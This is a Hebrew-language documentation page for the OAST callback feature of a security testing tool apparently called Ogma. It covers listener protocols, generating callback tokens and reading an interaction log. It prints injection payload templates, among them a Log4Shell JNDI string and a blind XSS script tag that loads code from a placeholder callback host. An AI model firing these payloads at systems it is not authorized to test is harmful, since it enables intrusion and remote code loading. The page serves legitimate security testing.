---
url: https://docs.ogmabox.com/he/app/utilities/oast.md
description: הגדירו קריאות חוזרות לבדיקות אבטחת יישומים מחוץ לערוץ ב-Ogma.
---

# OAST {#oast}

OAST (בדיקות אבטחת יישומים מחוץ לערוץ) מזהה חולשות שאינן יוצרות תגובה גלויה; במקום זאת, היעד יוצר חיבור יוצא למאזין שבשליטתכם, ובכך מאשר את הבעיה.

## איך זה עובד {#how-it-works}

Ogma מפעיל מאזינים מקומיים למספר פרוטוקולים. כאשר יישום היעד פונה לאחד המאזינים האלה, האינטראקציה מתועדת עם כתובת ה-IP של המקור, חותמת הזמן, הנתונים שהתקבלו והאסימון שהוזרק.

### פרוטוקולי המאזין {#listener-protocols}

| פרוטוקול | פורט ברירת מחדל | שימוש |
|---|---|---|
| HTTP | ניתן להגדרה | SSRF, XSS עיוור, וובהוקים |
| HTTPS | ניתן להגדרה | SSRF דרך TLS |
| DNS | ניתן להגדרה | הזרקה עיוורת, XXE, log4shell |
| SMTP | ניתן להגדרה | הזרקת כותרות דוא״ל, SSRF לשירותי דואר |

הגדירו את פורטי המאזין ואת שם הדומיין המשמש באסימונים שנוצרים בחלונית ההגדרות של OAST.

## יצירת אסימון לקריאה חוזרת {#generating-a-callback-token}

1. פתחו את **כלי עזר > OAST**.
2. לחצו על **יצירת אסימון**. כל אסימון ייחודי לבדיקה שלו.
3. העתיקו את האסימון. הוא כולל את דומיין המאזין ומזהה ייחודי, כך שאפשר לשייך אינטראקציות בחזרה לבדיקה המסוימת.

דוגמה לפורמט אסימון: `[unique-id].[your-oast-domain]`

## שימוש באסימונים במטענים {#using-tokens-in-payloads}

הזריקו את אסימון הקריאה החוזרת לכל שדה שבו היישום עשוי ליצור חיבור יוצא:

* **SSRF**: השתמשו באסימון HTTP/HTTPS בתור כתובת ה-URL של היעד: `https://[token]/`
* **XXE**: הפנו לאסימון ב-DOCTYPE או בכתובת URL של ישות חיצונית.
* **Log4Shell**: שלבו אותו בכותרת: `${jndi:ldap://[token]/a}`
* **XSS עיוור**: הזריקו אותו כ-src של סקריפט: `<script src="https://[token]/x.js"></script>`
* **הזרקת SMTP**: השתמשו בו ככתובת יעד או כ-URL בכותרות דוא״ל.

## יומן אינטראקציות {#interactions-log}

חלונית האינטראקציות מציגה כל קריאה חוזרת שהתקבלה:

| עמודה | תיאור |
|---|---|
| זמן | מועד קבלת האינטראקציה |
| פרוטוקול | HTTP, HTTPS, DNS או SMTP |
| IP מקור | כתובת ה-IP שיצרה את החיבור |
| אסימון | האסימון שאליו בוצעה הפנייה |
| נתונים | נתיב הבקשה, שם שאילתת DNS או נתוני SMTP |

לחצו על שורה כלשהי כדי לראות את פרטי האינטראקציה המלאים, כולל כותרות הבקשה והגוף, כאשר הם רלוונטיים.

## התאמת אינטראקציות לבדיקות {#matching-interactions-to-tests}

מכיוון שכל אסימון ייחודי, אפשר להזריק אסימונים שונים לפרמטרים או לבקשות שונים ולקבוע בדיוק איזו נקודת הזרקה הפעילה את הקריאה החוזרת.

## דפים קשורים {#related-pages}

* [סורק](./scanner.md)
* [ממצאים](../findings.md)
